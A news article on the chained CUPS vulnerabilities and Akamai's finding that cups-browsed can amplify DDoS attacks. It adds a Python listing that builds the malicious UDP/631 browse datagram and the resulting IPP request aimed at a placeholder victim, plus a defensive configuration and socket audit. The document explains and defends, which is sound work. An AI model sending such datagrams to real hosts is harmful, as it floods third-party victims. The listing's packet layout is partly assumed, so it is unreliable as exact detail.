One of the recently disclosed Common UNIX Printing System (CUPS) vulnerabilities could be even worse than expected, following new claims that it can be abused to amplify distributed denial of service (DDoS) attacks.
Akamai researchers have claimed that the attacks could reach an amplification factor of around 600x for an average attack, a worrying prospect for victims everywhere.
CUPS is an open-source printing system for Unix-like operating systems, including Linux and macOS; it was created by Easy Software Products, maintained by Apple for many years and is now developed under the OpenPrinting project. It provides a standardized way to manage print jobs and queues, supporting both local and network printers. CUPS uses the Internet Printing Protocol (IPP) as its primary protocol for submitting jobs and querying printers, while automatic printer discovery is handled by the companion cups-browsed daemon, which listens for DNS-SD and legacy CUPS browse announcements on the network. CUPS also includes a web-based interface for managing printers, print jobs and configurations.
Infinite loop
CUPS was recently found to have four flaws: CVE-2024-47076 (libcupsfilters), CVE-2024-47175 (libppd), CVE-2024-47176 (cups-browsed) and CVE-2024-47177 (foomatic-rip in cups-filters). Chained together, they let a threat actor advertise a fake, malicious printer that CUPS discovers and adds as a queue. All the attacker has to do is send a specially crafted packet to the cups-browsed service, which accepts such packets from any source. The moment a user sends a print job to this new device, a malicious command is executed on the machine running CUPS.
Separately, Akamai's experts found that the same cups-browsed flaw can be turned into a DDoS amplifier: a single crafted UDP packet sent to port 631 on a flawed CUPS server makes the server open a connection to whatever address the packet names as the printer and send it a larger IPP/HTTP request. Each probe costs the attacker a few bytes, while CPU and bandwidth are consumed on both the CUPS host and the target, in classic DDoS fashion. Their scan found almost 200,000 devices exposed to the internet, of which almost 60,000 could be used for DDoS campaigns.
In extreme cases, CUPS servers keep sending requests indefinitely, effectively entering an infinite loop.
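To make the amplification path concrete, the following Python is an added illustration, not code from the article, from Akamai or from the CUPS project. It builds the two messages involved in one round: the small UDP browse datagram an attacker sends to cups-browsed, and the IPP Get-Printer-Attributes request that cups-browsed then issues over HTTP to the address named in that datagram. The IPP binary encoding follows RFC 8010; the layout of the browse packet, the list of requested attributes and the victim address 192.0.2.10 (a documentation-range placeholder) are assumptions made for the example. The ratio it reports is only the per-request byte disparity; the 600x figure in the article comes from Akamai's measurements of the repeated traffic a single probe can trigger.

```python
import struct
from urllib.parse import urlsplit

# Operation and tag values from the IPP encoding (RFC 8010).
IPP_VERSION_2_0 = 0x0200
OP_GET_PRINTER_ATTRIBUTES = 0x000B
TAG_OPERATION_ATTRIBUTES, TAG_END_OF_ATTRIBUTES = 0x01, 0x03
TAG_KEYWORD, TAG_URI, TAG_CHARSET, TAG_LANGUAGE = 0x44, 0x45, 0x47, 0x48

# Constructed victim address (TEST-NET-1 documentation range), not a real host.
VICTIM_URI = "ipp://192.0.2.10:631/printers/demo"

# Assumed set of attributes the daemon asks for; the real list in cups-browsed may differ.
REQUESTED_ATTRIBUTES = [
    "printer-name", "printer-uri-supported", "printer-info", "printer-location",
    "printer-make-and-model", "printer-state", "printer-state-reasons", "printer-type",
    "ipp-versions-supported", "document-format-supported", "media-supported", "sides-supported",
]


def browse_datagram(printer_uri: str) -> bytes:
    """The attacker's UDP/631 payload: a legacy CUPS browse announcement.

    Layout (assumed from the legacy CUPS browsing format): printer type and state
    in hex, the printer URI, then quoted location, info and make-and-model fields.
    The address cups-browsed later contacts is taken entirely from the URI field.
    """
    return f'0 3 {printer_uri} "" "" ""\n'.encode()


def ipp_attribute(tag: int, name: str, values: list[str]) -> bytes:
    """Encode one IPP attribute; additional values of a set carry an empty name."""
    out = bytearray()
    for i, value in enumerate(values):
        name_bytes = name.encode() if i == 0 else b""
        value_bytes = value.encode()
        out += struct.pack(">BH", tag, len(name_bytes)) + name_bytes
        out += struct.pack(">H", len(value_bytes)) + value_bytes
    return bytes(out)


def ipp_get_printer_attributes(printer_uri: str, requested: list[str]) -> bytes:
    """Body of the request the CUPS host sends to the URI taken from the datagram."""
    body = bytearray(struct.pack(">HHI", IPP_VERSION_2_0, OP_GET_PRINTER_ATTRIBUTES, 1))
    body.append(TAG_OPERATION_ATTRIBUTES)
    body += ipp_attribute(TAG_CHARSET, "attributes-charset", ["utf-8"])
    body += ipp_attribute(TAG_LANGUAGE, "attributes-natural-language", ["en"])
    body += ipp_attribute(TAG_URI, "printer-uri", [printer_uri])
    body += ipp_attribute(TAG_KEYWORD, "requested-attributes", requested)
    body.append(TAG_END_OF_ATTRIBUTES)
    return bytes(body)


def http_request(printer_uri: str, body: bytes) -> bytes:
    """Wrap the IPP body the way it travels on the wire: an HTTP POST to the printer path."""
    parts = urlsplit(printer_uri)
    host = f"{parts.hostname}:{parts.port or 631}"
    headers = (f"POST {parts.path or '/'} HTTP/1.1\r\n"
               f"Host: {host}\r\n"
               "Content-Type: application/ipp\r\n"
               f"Content-Length: {len(body)}\r\n\r\n")
    return headers.encode() + body


def amplification(printer_uri: str = VICTIM_URI) -> dict:
    """Bytes the attacker sends versus bytes the CUPS host then sends to the victim."""
    trigger = browse_datagram(printer_uri)
    body = ipp_get_printer_attributes(printer_uri, REQUESTED_ATTRIBUTES)
    outbound = http_request(printer_uri, body)
    return {
        "datagram_bytes": len(trigger),
        "request_bytes": len(outbound),
        "factor": len(outbound) / len(trigger),
    }


if __name__ == "__main__":
    r = amplification()
    print(f"attacker sends {r['datagram_bytes']} B; CUPS host sends {r['request_bytes']} B "
          f"to the victim per request ({r['factor']:.1f}x before any retries)")
```

Note that the datagram is fire-and-forget UDP from a source the attacker controls, while the outbound request costs the CUPS host a TCP connection plus the HTTP and IPP payload, and the victim receives every one of them; the daemon's retries and the number of exposed servers recruited do the rest.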
“In the worst case scenario, we observed what appeared to be an endless stream of connection attempts and requests as a result of a single probe. These streams appear to have no end and will continue until the daemon is killed or restarted,” Akamai explained. “Many of these systems we observed during testing received thousands of requests and sent them to our testing infrastructure. In some cases, this behavior appeared to continue indefinitely.”
The DDoS amplification attack can be carried out in just a few minutes, for virtually no money. IT teams are urged to apply the patches for the flaws above as soon as possible and, on hosts that do not need automatic printer discovery, to disable or remove cups-browsed and block inbound UDP port 631 at the firewall.
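For administrators who want a quick check of whether a host is exposed in the way described above, the following Python is an added example, not code from the article or from the CUPS project. It audits a cups-browsed.conf snippet for the legacy "cups" browse protocol (the setting that makes cups-browsed listen on UDP port 631) and an `ss -ulnp` listing for a non-loopback socket bound to that port. The configuration text and the `ss` output are constructed samples, and the assumed default of `BrowseRemoteProtocols dnssd cups` is taken from the value most distributions ship; replace the samples with the real file and the live command output on your own hosts.

```python
# Constructed sample of /etc/cups/cups-browsed.conf, not a real file. The "cups"
# keyword in BrowseRemoteProtocols is what enables the legacy UDP/631 listener
# that cups-browsed uses to receive browse packets from the network.
SAMPLE_CONF = """\
# Default shipped by many distributions:
BrowseRemoteProtocols dnssd cups
BrowseAllow all
"""

# Mitigation setting for hosts where the daemon cannot simply be removed.
HARDENED_CONF = "BrowseRemoteProtocols none\n"

# Constructed `ss -ulnp` output (UDP listeners), not captured from a real host.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
UNCONN 0      0      0.0.0.0:631        0.0.0.0:*         users:(("cups-browsed",pid=1234,fd=7))
UNCONN 0      0      127.0.0.1:323      0.0.0.0:*         users:(("chronyd",pid=800,fd=5))
"""
SAFE_SS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
UNCONN 0      0      127.0.0.1:323      0.0.0.0:*         users:(("chronyd",pid=800,fd=5))
"""

ASSUMED_DEFAULT = ["dnssd", "cups"]  # value assumed when the directive is absent


def browse_remote_protocols(conf_text: str) -> list[str]:
    """Effective BrowseRemoteProtocols value: the last uncommented directive wins."""
    protocols = list(ASSUMED_DEFAULT)
    for raw in conf_text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        key, _, value = line.partition(" ")
        if key.lower() == "browseremoteprotocols":
            protocols = value.lower().split() or ["none"]
    return protocols


def udp_631_bound(ss_output: str) -> list[str]:
    """Local sockets from `ss -ulnp` bound to UDP port 631 on a non-loopback address."""
    exposed = []
    for line in ss_output.splitlines():
        cols = line.split()
        if len(cols) < 5:
            continue
        addr, _, port = cols[3].rpartition(":")  # "Local Address:Port" column
        if port == "631" and addr not in ("127.0.0.1", "[::1]"):
            exposed.append(cols[3])
    return exposed


def audit(conf_text: str, ss_output: str) -> list[str]:
    """Findings an administrator should act on; an empty list means no exposure found."""
    findings = []
    if "cups" in browse_remote_protocols(conf_text):
        findings.append("cups-browsed.conf enables the legacy 'cups' browse protocol; "
                        "set 'BrowseRemoteProtocols none' or remove cups-browsed")
    for local in udp_631_bound(ss_output):
        findings.append(f"UDP/631 is bound on {local}; block it at the firewall until patched")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONF, SAMPLE_SS) or ["no cups-browsed exposure found"]:
        print(finding)
```

Both checks matter: a hardened configuration that has not been applied by restarting the daemon still leaves the socket open, and a socket bound only to loopback is not reachable by the internet-wide probes Akamai describes.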
Via BleepingComputer